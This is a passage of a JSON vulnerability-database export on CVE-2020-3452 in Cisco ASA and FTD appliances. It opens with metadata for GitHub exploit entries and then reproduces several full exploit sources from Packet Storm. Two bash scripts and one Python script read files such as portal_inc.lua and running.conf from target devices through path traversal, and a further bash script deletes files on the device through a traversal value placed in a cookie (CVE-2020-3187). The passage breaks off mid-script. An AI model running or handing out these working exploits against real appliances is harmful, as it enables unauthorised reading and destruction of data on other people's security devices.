"bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 
10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2022-07-06T14:05:45", "id": "486B7BFA-C5C7-5FA9-AF20-76F859ABFD6D", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-07-06T10:35:04", "description": "# CVE-2020-3452\nCVE-2020-3452 - directory traversal in Cisco ASA...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-08-03T11:02:23", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Cisco Adaptive Security Appliance", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2022-07-06T09:55:04", "id": "1A3E21B6-FA92-54E8-9E68-C428AED33899", "href": "", "cvss": {"score": 
5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-07-27T07:48:41", "description": "# CVE-2020-3452 - Cisco ASA Scanner\n\nScanning for CVE-2020-3452 ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-07-24T15:04:45", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Cisco Adaptive Security Appliance", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2022-07-27T07:12:05", "id": "1C799A66-9A29-5A67-B2E3-41F3AE216A0E", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:41:31", "description": "<details open>\n<summary>CVE-2020-3452</summary>\n<br>\nA [WIP] pyt...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": 
"NONE"}, "impactScore": 3.6}, "published": "2020-11-18T21:31:50", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Cisco Adaptive Security Appliance", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2020-11-18T21:48:22", "id": "6D3B65B1-5E34-58B2-96A9-9E47575E070D", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-08-18T01:20:35", "description": "# CVE-2020-3452\n\nLittle, stupid python validator(?) 
for CVE-2020...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-07-25T16:11:55", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Cisco Adaptive Security Appliance", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2020-10-20T14:27:21", "id": "1A8487C7-CACB-5328-9E37-41E9F4DF336F", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-08-18T01:20:37", "description": "# CVE-2020-3452\n\n## TL;DR\nThis is an exploit for CVE-2020-3452. 
...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-08-01T08:27:11", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Cisco Adaptive Security Appliance", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2022-07-27T07:12:07", "id": "4FD04BD1-692B-5EE7-B79B-19C98E9C3B32", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-08-18T01:20:42", "description": "#CVE-2020-3452\n#CVSS 7.5 (base)\n\nwget https://bit.ly/32Q065t\n\nwg...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-07-24T16:26:52", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Cisco Adaptive Security Appliance", 
"bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2021-12-15T14:39:54", "id": "76A6F282-B5BA-5D47-AA07-B2415C9E3BFB", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-08-18T01:21:26", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-09-28T05:00:37", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Cisco Adaptive Security Appliance", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": 
"2022-07-26T18:43:17", "id": "BD547AE3-8878-5BDD-8C7B-09AB2483B0D8", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:43:36", "description": "# Cisco-ASA-LFI\n(CVE-2020-3452) Cisco Adaptive Security Applianc...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-08-31T14:11:19", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Cisco Adaptive Security Appliance", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2020-11-07T10:00:24", "id": "F9A613C5-972B-544D-A63C-E3E9A3F88340", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:38:27", "description": "# CVE-2020-3452\n\n", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, 
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2020-10-25T00:00:00", "id": "CPAI-2020-0710", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "packetstorm": [{"lastseen": "2020-08-01T01:16:14", "description": "", "cvss3": {}, "published": "2020-07-29T00:00:00", "type": "packetstorm", "title": "Cisco Adaptive Security Appliance Software 9.11 Local File Inclusion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-3452"], "modified": "2020-07-29T00:00:00", "id": "PACKETSTORM:158647", "href": "https://packetstormsecurity.com/files/158647/Cisco-Adaptive-Security-Appliance-Software-9.11-Local-File-Inclusion.html", "sourceData": "`# Exploit Title: Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion \n# Google Dork: inurl:/+CSCOE+/ \n# Date: 2020-08-27 \n# Exploit Author: 0xmmnbassel \n# Vendor Homepage: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86 \n# Version: Cisco ASA Software >=9.14 except 9.11 Cisco FTD Software >=6.2.2 and 6.2.3,6.3.0,6.4.0,6.50,6.60 \n# Vulnerability Type: unauthenticated file read \n# CVE: CVE-2020-3452 \n \n \n#!/bin/bash \n \n \nread=\"%2bCSCOE%2b/portal_inc.lua\" \n \n \nhelpFunction() \n{ \necho \"\" \necho -e \"\\t\\tCVE-2020-3452\" \necho \"\" \necho \"Usage: $0 -l targets.txt -r %2bCSCOE%2b/portal_inc.lua \" \necho -e \"\\t-l for list of IPs in text file\" \necho -e \"\\t-r file to read, default: %2bCSCOE%2b/portal_inc.lua\" \necho -e \"\\t-i for single IP test\" \nexit 1 \n} \n \nwhile getopts \"l:r:i:\" opt \ndo \ncase \"$opt\" in \nl ) input=\"$OPTARG\" ;; \nr ) read=\"$OPTARG\" ;; \ni ) website=\"$OPTARG\" ;; \n? 
) helpFunction ;; \nesac \ndone \n \n \n \n#if $website is empty or $input is empty \nif [ -z \"$website\" ] && [ -z \"$input\" ] \nthen \necho \"Some/all of the parameters are empty\"; \nhelpFunction \nfi \n \n#usage \n \n \nif [ -z \"$website\"]; \nthen \nwhile IFS= read -r line \ndo \nname=$(echo $line | cut -c9-19) \n#echo \"testing $line\" \nfilename=\"$name.txt\" \n#echo $response \nstatus=$(curl -LI $line\"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=\"$read -o /dev/null -w '%{http_code}\\n' -s) \n \nif [ $status -eq \"400\" ]; then \necho \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!\" \nelse \nwget \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read\" -O $name.txt \n \nif [ -s $filename ]; then \necho \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read...\" \necho \"downloaded!, $line is vulnerable to CVE-2020-3452.\" \n \nelse \necho \"not vulnerable!\" \nrm -rf $filename \nfi \nfi \ndone < \"$input\" \nelse \n \nname=$(echo $website | cut -c9-16) \nfilename=\"$name.txt\" \n \nstatus=$(curl -LI $website\"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=\"$read -o /dev/null -w '%{http_code}\\n' -s) \nif [ $status -eq \"Bad Request\" ]; then \necho \"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!\" \nelse \n \necho \"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read...\" \nwget \"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read\" -O $name.txt \nif [ -s $filename ]; then \necho \"downloaded!, $website is vulnerable to CVE-2020-3452.\" \nelse \necho \"not vulnerable!\" \nrm -rf $filename \nfi \nfi \n \nfi \n`\n", 
"sourceHref": "https://packetstormsecurity.com/files/download/158647/ciscoasa911-lfi.txt", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-15T16:05:11", "description": "", "cvss3": {}, "published": "2020-12-15T00:00:00", "type": "packetstorm", "title": "Cisco ASA 9.14.1.10 / FTD 6.6.0.1 Path Traversal", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-3452"], "modified": "2020-12-15T00:00:00", "id": "PACKETSTORM:160497", "href": "https://packetstormsecurity.com/files/160497/Cisco-ASA-9.14.1.10-FTD-6.6.0.1-Path-Traversal.html", "sourceData": "`# Exploit Title: Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2) \n# Date: 12 Dec 2020 \n# Exploit Author: Freakyclown@cygenta.co.uk \n# Vendor Homepage: cisco.com \n# Software Link: It\u2019s against Hardware, specifically ASA\u2019s and FTD\u2019s \n# Version: ASAs (from version 9.6 to 9.14.1.10) and FTD\u2019s (versions 6.2.3 to 6.6.0.1) \n# Tested on: exploit runs on Python3 on OSX and on Kali Linux against cisco ASA 9.14 \n# CVE : CVE-2020-3452 \n# Github : https://github.com/cygenta/CVE-2020-3452 \n \nimport requests \n \n# Written by freakyclown for @CygentaHQ \n# Cisco ASA Path Traversal \n# CVE-2020-3452 \n# Usage: CVE-2020-3452.py {target}\" \n# Example: CVE-2020-3452.py 192.168.0.12\" \n# Requires - Requests - pip3 install requests \n# \n# This tool takes advantage of the above cve and attempts to \n# download files as listed below, it is suggested that you make \n# a working folder for the outputfiles to avoid confusion if \n# attacking mutliple ASA's \n \n# set your target \ntarget = input(\"Enter target IP/Url: \") \n \n \ndef grabstuff(): \nfor file in files: \nprint(\"trying: \", file) \n \n#set request parameters \nparams = ( \n('type', 'mst'), \n('textdomain', '+CSCOE+/'+file), \n('default-language', ''), \n('lang', '../'), \n) \n \n# set the response to the result of the request, inputting in target and params and ignoring ssl cert problems 
\nresponse = requests.get('https://'+target+'/+CSCOT+/translation-table', params=params, verify=False) \n# write the file to the disk \nf = open(file,\"w\") \nf.write(response.text) \nf.close() \n \n \n \n# this is a list of files available to download, more will be added in time \n# if anyone has a list of ASA files, I'd be happy to add here \nfiles = { \n\"sess_update.html\", \n\"blank.html\", \n\"noportal.html\", \n\"portal_ce.html\", \n\"portal.html\", \n\"logon_custom.css\", \n\"svc.html\", \n\"logo.gif\", \n\"portal_inc.lua\", \n\"nostcaccess.html\", \n\"session.js\", \n\"portal.js\", \n\"portal_custom.css\", \n\"running.conf\", \n\"tlbrportal_forms.js\", \n\"logon_forms.js\", \n\"win.js\", \n\"portal.css\", \n\"lced.html\", \n\"pluginlib.js\", \n\"useralert.html\", \n\"ping.html\", \n\"app_index.html\", \n\"shshimdo_url\", \n\"session_password.html\", \n\"relayjar.html\", \n\"relayocx.html\", \n\"color_picker.js\", \n\"color_picker.html\", \n\"cedhelp.html\", \n\"cedmain.html\", \n\"cedlogon.html\", \n\"cedportal.html\", \n\"portal_elements.html\", \n\"commonspawn.js\", \n\"common.js\", \n\"appstart.js\", \n\"relaymonjar.html\", \n\"relaymonocx.html\", \n\"cedsave.html\", \n\"tunnel_linux.jnlp\", \n\"ask.html\", \n\"no_svc.html\", \n\"preview.html\", \n\"cedf.html\", \n\"ced.html\", \n\"logon_redirect.html\", \n\"logout.html\", \n\"tunnel_mac.jnlp\", \n\"gp-gip.html\", \n\"auth.html\", \n\"wrong_url.html\", \n\"logon.html\"} \n \n \n# obvious thing is obvious, try the things and barf if fail \ntry: \ngrabstuff() \nexcept Exception as err: \nprint(\"Something went wrong sorry\") \nprint(err) \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/160497/ciscoasaftd-traversal.txt", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-10-12T19:02:07", "description": "", "cvss3": {}, "published": "2020-10-11T00:00:00", "type": "packetstorm", "title": "Cisco ASA / FTD 9.6.4.42 Path Traversal", "bulletinFamily": 
"exploit", "cvss2": {}, "cvelist": ["CVE-2020-3452"], "modified": "2020-10-11T00:00:00", "id": "PACKETSTORM:159523", "href": "https://packetstormsecurity.com/files/159523/Cisco-ASA-FTD-9.6.4.42-Path-Traversal.html", "sourceData": "`# Exploit Title: Cisco ASA and FTD 9.6.4.42 - Path Traversal \n# Date: 2020-10-10 \n# Exploit Author: 3ndG4me \n# Vendor: www.cisco.com \n# Product: https://www.cisco.com/c/en/us/products/security/asa-firepower-services/index.html \n# CVE : CVE-2020-3452 \n \n \n \nTARGET=$1 \nCISCO_KNOWN_FILES=\"logo.gif http_auth.html user_dialog.html localization_inc.lua portal_inc.lua include nostcaccess.html ask.html no_svc.html svc.html session.js useralert.html ping.html help app_index.html tlbr portal_forms.js logon_forms.js win.js portal.css portal.js sess_update.html blank.html noportal.html portal_ce.html portal.html home logon_custom.css portal_custom.css preview.html session_expired custom portal_elements.html commonspawn.js common.js appstart.js appstatus relaymonjar.html relaymonocx.html relayjar.html relayocx.html portal_img color_picker.js color_picker.html cedhelp.html cedmain.html cedlogon.html cedportal.html cedsave.html cedf.html ced.html lced.html files 041235123432C2 041235123432U2 pluginlib.js shshim do_url clear_cache connection_failed_form apcf ucte_forbidden_data ucte_forbidden_url cookie session_password.html tunnel_linux.jnlp tunnel_mac.jnlp sdesktop gp-gip.html auth.html wrong_url.html logon_redirect.html logout.html logon.html test_chargen\" \nmkdir cisco_asa_files \n \nif [ -z \"$1\" ]; \nthen \necho \"Usage: cve-2020-3452.sh <target ip/hostname>\" \necho \"Example: cve-2020-3452.sh mytarget.com\" \necho \"Files that are downloaded will be in the newly created 'cisco_asa_files' directory\" \necho \"Target not specificed...exiting...\" \nelse \nfor FILE in $CISCO_KNOWN_FILES; \ndo \ncurl \"https://$TARGET/+CSCOT+/translation-table?type=mst&textdomain=%2bCSCOE%2b/${FILE}&default-language&lang=../\" | tee 
cisco_asa_files/$FILE; \ndone \nfi \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/159523/ciscoasaftd96442-traversal.txt", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-08-01T01:16:14", "description": "", "cvss3": {}, "published": "2020-07-29T00:00:00", "type": "packetstorm", "title": "Cisco Adaptive Security Appliance Software 9.7 Arbitrary File Deletion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-3452", "CVE-2020-3187"], "modified": "2020-07-29T00:00:00", "id": "PACKETSTORM:158648", "href": "https://packetstormsecurity.com/files/158648/Cisco-Adaptive-Security-Appliance-Software-9.7-Arbitrary-File-Deletion.html", "sourceData": "`# Exploit Title: Cisco Adaptive Security Appliance Software 9.7 - Unauthenticated Arbitrary File Deletion \n# Google Dork: inurl:/+CSCOE+/ \n# Date: 2020-08-27 \n# Exploit Author: 0xmmnbassel \n# Vendor Homepage: https://www.cisco.com/c/en/us/products/security/asa-firepower-services/index.html#~models \n# Version: Cisco ASA Software >=9.14 except 9.11 Cisco FTD Software >=6.2.2 and 6.2.3,6.3.0,6.4.0,6.50,6.60 \n# Vulnerability Type: unauthenticated file deletion \n# Version: Cisco ASA Software releases 9.5 and earlier, as well as \n# Release 9.7, have reached end of software maintenance. Customers are \n# advised to migrate to a supported release that includes the fix for \n# this vulnerability. \n# CVE : CVE-2020-3187 \n \n#!/bin/bash \n \ndelete=\"csco_logo.gif\" \n \n \nhelpFunction() \n{ \necho \"\" \necho -e \"\\t\\tCVE-2020-3187\" \necho \"\" \necho \"Usage: $0 -l targets.txt -d csco_logo.gif \" \necho -e \"\\t-l for list of IPs in text file\" \necho -e \"\\t-d file to be deleted, default: ./+CSCOE+/csco_logo.gif\" \necho -e \"\\t-i for single IP test\" \nexit 1 \n} \n \nwhile getopts \"l:d:i:\" opt \ndo \ncase \"$opt\" in \nl ) input=\"$OPTARG\" ;; \nd ) delete=\"$OPTARG\" ;; \ni ) website=\"$OPTARG\" ;; \n? 
) helpFunction ;; \nesac \ndone \n \n \n#if $website is empty or $input is empty \nif [ -z \"$website\" ] && [ -z \"$input\" ] \nthen \necho \"Some/all of the parameters are empty\"; \nhelpFunction \nfi \n \n#usage \n \nif [ -z \"$input\"]; \nthen \nstatus=$(curl -LI $website/+CSCOU+/$delete -o /dev/null -w \n'%{http_code}\\n' -s) \necho \"checking if $website has the $delete file\" \nif [ $status -eq 200 ]; then \necho \"$website/+CSCOU+/$delete exists, deleting it...\" \ncurl -H \"Cookie: token=..//+CSCOU+/$delete\" -v -s -o \nresultsindv.txt $website/+CSCOE+/session_password.html \ndelcheck=$(curl -LI $website/+CSCOU+/$delete -o /dev/null -w \n'%{http_code}\\n' -s) \nif [ delcheck -eq 404]; then \necho \"Deleted!, $website is vulnerable to CVE-2020-3187.\" \nelse \necho \"Cannot Delete $website/+CSCOU+/$delete file, check it manaully!\" \nfi \nelse \necho \"$website/+CSCOU+/$delete doesn't exist!\" \nfi \n \nelse \nwhile IFS= read -r line \ndo \necho \"Checking $line if file $delete exist..\" \n#echo $response \nstatus=$(curl -LI $line/+CSCOU+/$delete -o /dev/null -w \n'%{http_code}\\n' -s) \nif [ $status -eq 200 ]; then \necho \"$line/+CSCOU+/$delete exists, deleting it...\" \ncurl -H \"Cookie: token=..//+CSCOU+/$delete\" -v -s -o \nresults.txt $line/+CSCOE+/session_password.html \n \n#for no verbosity \n#curl -H \"Cookie: token=..//+CSCOU+/$delete\" -s -o \nresults.txt $line/+CSCOE+/session_password.html \ndelcheck=$(curl -LI $line/+CSCOU+/$delete -o /dev/null -w \n'%{http_code}\\n' -s) \nif [ delcheck -eq 404]; then \necho \"Deleted!, $line is vulnerable to CVE-2020-3187.\" \nelse \necho \"Cannot Delete $line/+CSCOU+/$delete file, check it manaully!\" \nfi \nelse \necho \"$line/+CSCOU+/$delete doesn't exist!\" \nfi \ndone < \"$input\" \n \n \nfi \n \n \n \n \n#!/bin/bash \n \n \nread=\"%2bCSCOE%2b/portal_inc.lua\" \n \n \nhelpFunction() \n{ \necho \"\" \necho -e \"\\t\\tCVE-2020-3452\" \necho \"\" \necho \"Usage: $0 -l targets.txt -r 
%2bCSCOE%2b/portal_inc.lua \" \necho -e \"\\t-l for list of IPs in text file\" \necho -e \"\\t-r file to read, default: %2bCSCOE%2b/portal_inc.lua\" \necho -e \"\\t-i for single IP test\" \nexit 1 \n} \n \nwhile getopts \"l:r:i:\" opt \ndo \ncase \"$opt\" in \nl ) input=\"$OPTARG\" ;; \nr ) read=\"$OPTARG\" ;; \ni ) website=\"$OPTARG\" ;; \n? ) helpFunction ;; \nesac \ndone \n \n \n \n#if $website is empty or $input is empty \nif [ -z \"$website\" ] && [ -z \"$input\" ] \nthen \necho \"Some/all of the parameters are empty\"; \nhelpFunction \nfi \n \n#usage \n \n \nif [ -z \"$website\"]; \nthen \nwhile IFS= read -r line \ndo \nname=$(echo $line | cut -c9-19) \n#echo \"testing $line\" \nfilename=\"$name.txt\" \n#echo $response \nstatus=$(curl -LI $line\"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=\"$read -o /dev/null -w '%{http_code}\\n' -s) \n \nif [ $status -eq \"400\" ]; then \necho \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!\" \nelse \nwget \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read\" -O $name.txt \n \nif [ -s $filename ]; then \necho \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read...\" \necho \"downloaded!, $line is vulnerable to CVE-2020-3452.\" \n \nelse \necho \"not vulnerable!\" \nrm -rf $filename \nfi \nfi \ndone < \"$input\" \nelse \n \nname=$(echo $website | cut -c9-16) \nfilename=\"$name.txt\" \n \nstatus=$(curl -LI $website\"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=\"$read -o /dev/null -w '%{http_code}\\n' -s) \nif [ $status 